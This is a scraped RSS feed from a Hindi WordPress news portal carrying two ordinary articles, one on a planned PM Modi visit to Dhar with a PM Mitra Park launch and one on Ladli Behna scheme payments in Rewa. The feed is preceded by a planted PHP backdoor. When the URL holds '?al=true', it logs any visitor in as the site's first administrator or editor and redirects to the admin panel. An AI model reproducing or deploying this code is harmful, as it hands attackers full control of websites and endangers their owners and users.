// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Ladli Behna – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Tue, 09 Sep 2025 03:40:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 धार में PM मोदी का दौरा, लाड़ली बहनों को देंगे सौगात; PM Mitra Park का शिलान्यास https://pratyushaashakinayikiran.com/?p=183999 Tue, 09 Sep 2025 03:40:00 +0000 https://pratyushaashakinayikiran.com/?p=183999 धार 

मध्यप्रदेश के दौरे पर आ रहे प्रधानमंत्री नरेन्द्र मोदी देश की महिलाओं और परिवारों को स्वास्थ्य समृद्धि का मंत्र दे सकते हैं। सबकुछ ठीक रहा तो प्रधानमंत्री मध्यप्रदेश से 'सशक्त नारी, समृद्ध अभियान' को हरी झंडी देंगे। लक्ष्य महिलाओं की सेहत की चिंता करना, उनके लिए शारीरिक आहार व पोषण व्यवस्था को मजबूत बनाना और समग्र देखभाल को मजबूत करना होगा, ताकि महिलाओं को स्वास्थ्य संबंधी परेशानियों से लड़ने में सक्षम बनाया जा सके। जब महिलाएं स्वस्थ रहेंगी तो स्वाभाविक है कि बच्चे भी तंदुरुस्त होंगे। जब जच्चा-बच्चा दोनों अच्छे होंगे तो आधी से अधिक परेशानियां तो वैसे ही खत्म हो जाएंगी। इस तरह लाखों परिवार संकट से बाहर रहेंगे। प्रधानमंत्री नरेन्द्र मोदी अपने आगामी मध्यप्रदेश दौरे पर महिलाओं और परिवारों को स्वास्थ्य समृद्धि का मंत्र देने वाले हैं। चर्चा है कि वे यहां से ‘सशक्त नारी, समृद्ध अभियान’ की शुरुआत करेंगे। इस योजना का उद्देश्य महिलाओं की शारीरिक सेहत, आहार और पोषण व्यवस्था को मजबूत करना है, ताकि वे स्वास्थ्य संबंधी चुनौतियों का बेहतर ढंग से सामना कर सकें। जब महिलाएं स्वस्थ होंगी तो बच्चों का विकास भी बेहतर होगा और लाखों परिवारों की परेशानियां कम हो जाएंगी। जच्चा-बच्चा की सेहत में सुधार अपने आप में समाज की मजबूती का आधार बनेगा।

पीएम मित्रा पार्क का शिलान्यास भी होगा

प्रधानमंत्री मोदी का दौरा 17 सितंबर को प्रस्तावित है। कार्यक्रम की जगह धार जिले के बदनावर को माना जा रहा है। यहीं से वे देश के पहले पीएम मित्रा पार्क का शिलान्यास करेंगे। यह पार्क टेक्सटाइल क्षेत्र में रोजगार और निवेश की नई संभावनाओं को जन्म देगा। खास बात यह है कि यह भारत में बनने वाला पहला ऐसा पार्क होगा जो सबसे पहले तैयार भी होगा। इससे स्थानीय युवाओं को रोजगार और प्रदेश को औद्योगिक बढ़त मिलेगी।
पहले भी मध्यप्रदेश से मिले हैं बड़े तोहफे

यह पहला मौका नहीं है जब प्रधानमंत्री मोदी मध्यप्रदेश से कोई बड़ा अभियान शुरू करने जा रहे हैं। इससे पहले भी उन्होंने कई राष्ट्रीय कार्यक्रम यहीं से लॉन्च किए थे। उदाहरण के तौर पर, सिकलसेल एनीमिया उन्मूलन अभियान, किसानों के लिए फसल बीमा योजना की सौगात, महिलाओं को सब्सिडी वाले गैस सिलेंडर, छोटे व्यापारियों के लिए स्वनिधि योजना और नदी जोड़ो अभियान की शुरुआत मध्यप्रदेश की धरती से हुई थी। इन पहलों ने देशभर के लोगों को सीधा लाभ पहुंचाया।

महिला सशक्तिकरण के लिए विशेष आह्वान

भोपाल के जंबूरी मैदान से प्रधानमंत्री मोदी पहले भी महिलाओं के सर्वांगीण सशक्तिकरण का संदेश दे चुके हैं। यह आयोजन देवी अहिल्याबाई होल्कर की 300वीं जयंती पर हुआ था। उस समय भी उन्होंने महिलाओं की भूमिका और उनकी ताकत को देश की प्रगति से जोड़ा था। अब एक बार फिर मध्यप्रदेश से नया अभियान शुरू करके वे महिलाओं की सेहत और परिवारों की मजबूती पर ध्यान केंद्रित करेंगे।

इन अभियानों, कार्यक्रमों को दे चुके हरी झंडी

मोदी देश को मध्यप्रदेश से पहले भी कई सौगात दे चुके हैं। उन्होंने सिकलसेल एनीमिया के खात्मे की शुरुआत का आह्वान यहीं से किया था। किसानों को फसल बीमा की सौगात, महिलाओं को सब्सिडी वाले गैस सिलेंडरों का तोहफा, स्वनिधि का पहला कार्यक्रम और नदी जोड़ो अभियान की नींव भी इसी धरती से रखी थी। भोपाल के जंबूरी मैदान से मोदी देशभर की महिलाओं को हर दृष्टि से सशक्त बनाने का आह्वान कर चुके हैं। आयोजन देवी अहिल्या बाई की 300वीं जयंती पर किया गया था।

]]>
प्रदेश की बहनों को राखी के पहले ही मिल गया है रक्षाबंधन का उपहार – उप मुख्यमंत्री https://pratyushaashakinayikiran.com/?p=59509 Sun, 11 Aug 2024 13:16:00 +0000 https://pratyushaashakinayikiran.com/?p=59509  रीवा
प्रदेश के साथ-साथ रीवा जिले में भी लाड़ली बहना उत्सव मनाया गया। मुख्य समारोह नगर निगम के टाउनहाल में आयोजित किया गया। समारोह के मुख्य अतिथि उप मुख्यमंत्री राजेन्द्र शुक्ल को लाड़ली बहनों ने रक्षासूत्र बांधकर स्नेह और आशीर्वाद दिया। समारोह में उप मुख्यमंत्री ने विभिन्न योजनाओं से लाभान्वित हितग्राहियों को हितलाभ का वितरण किया। जिले की लाड़ली बहना योजना की 4.10 लाख बहनों के खाते में मासिक किश्त तथा 250 रुपए रक्षाबंधन के उपहार  के रूप में अंतरित किए गए। समारोह में श्योपुर जिले के विजयपुर में आयोजित राज्य स्तरीय समारोह का सजीव प्रसारण दिखाया गया। इसमें मुख्यमंत्री डॉ मोहन यादव ने वर्चुअल माध्यम से प्रदेश की 1.29 करोड़ लाड़ली बहना हितग्राहियों के खाते में 1897 करोड़ रुपए की राशि अंतरित की। मुख्यमंत्री ने उज्ज्वला योजना हितग्राहियों के खाते में 52 करोड़ रुपए तथा सामाजिक सुरक्षा पेंशन के हितग्राहियों के खाते में 332 करोड़ रुपए वर्चुअल माध्यम से अंतरित किए।

    टाउनहाल में आयोजित समारोह में उप मुख्यमंत्री शुक्ल ने कहा कि प्रदेश के यशस्वी मुख्यमंत्री जी ने रक्षाबंधन के पहले ही लाड़ली बहनों को रक्षाबंधन का उपहार दे दिया है। लाड़ली बहना योजना की प्रत्येक बहन के खाते में 1250 रुपए की मासिक राशि के साथ रक्षाबंधन के लिए 250 रुपए की अतिरिक्त राशि दी गई है। हमारी सरकार महिलाओं के कल्याण और विकास के लिए लगातार प्रयास कर रही है। सरकार ने गरीबों, किसानों, युवाओं और महिलाओं के विकास को सर्वोच्च प्राथमिकता दी है। लाड़ली बहना योजना, प्रधानमंत्री आवास योजना, किसान सम्मान निधि, स्वनिधि योजना, युवा उद्यमी योजना सहित अन्य योजनाएं इस बात का प्रमाण हैं। लाड़ली बहना योजना से हर माह 1250 रुपए की राशि दी जा रही है। इससे महिलाओं की छोटी-मोटी जरूरतें पूरी हो जाती हैं। उन्हें अपने काम के लिए किसी के सामने हाथ नहीं फैलाना पड़ता है। इस योजना से महिलाओं में आत्मविश्वास बढ़ा है साथ ही आर्थिक आत्मनिर्भरता मिली है।

    समारोह में उप मुख्यमंत्री ने सभी को हर घर तिरंगा अभियान की शपथ दिलाई। उप मुख्यमंत्री ने कहा कि राष्ट्रीय ध्वज शान से लहराता है तो हमारा सीना चौड़ा हो जाता है। हमारा तिरंगा देश की आजादी और राष्ट्र गौरव का प्रतीक है। जिले भर में 11 अगस्त से 15 अगस्त तक हर घर तिरंगा अभियान चलाया जा रहा है। देश के प्रधानमंत्री जी और प्रदेश के मुख्यमंत्री जी के साथ हर नागरिक अपने घर में शान से तिरंगा लहराए। अपने घरों में तिरंगा लहराकर राष्ट्र वंदना और आजादी के पर्व में अपनी सहभागिता निभाएं। अपने घर में तिरंगा लहराकर अपना और देश का सम्मान बढ़ाएं।

    समारोह में उप मुख्यमंत्री ने कन्या पूजन करके बेटियों का सम्मान किया। उप मुख्यमंत्री ने एक पेड़ माँ के नाम अभियान में नगर निगम परिसर के थ्रीआर पार्क में पौधे रोपित किए। समारोह में जिला पंचायत अध्यक्ष श्रीमती नीता कोल, जिला पंचायत सदस्य श्रीमती गीता माझी, नगर निगम के अध्यक्ष व्यंकटेश पाण्डेय, कलेक्टर श्रीमती प्रतिभा पाल, प्रभारी आयुक्त नगर निगम डॉ सौरभ सोनवणे, राजेश पाण्डेय, पार्षद श्रीमती ज्योति सिंह, पार्षद दीनानाथ वर्मा, दारा सिंह, अम्बुज रजक, पूर्व पार्षद सतीश सिंह, उपायुक्त नगर निगम रूपाली द्विवेदी, प्रभारी जिला महिला एवं बाल विकास अधिकारी अनिल जैन तथा बड़ी संख्या में महिलाएं शामिल हुर्इं। समारोह का संचालन सहायक संचालक आशीष द्विवेदी ने किया।

]]>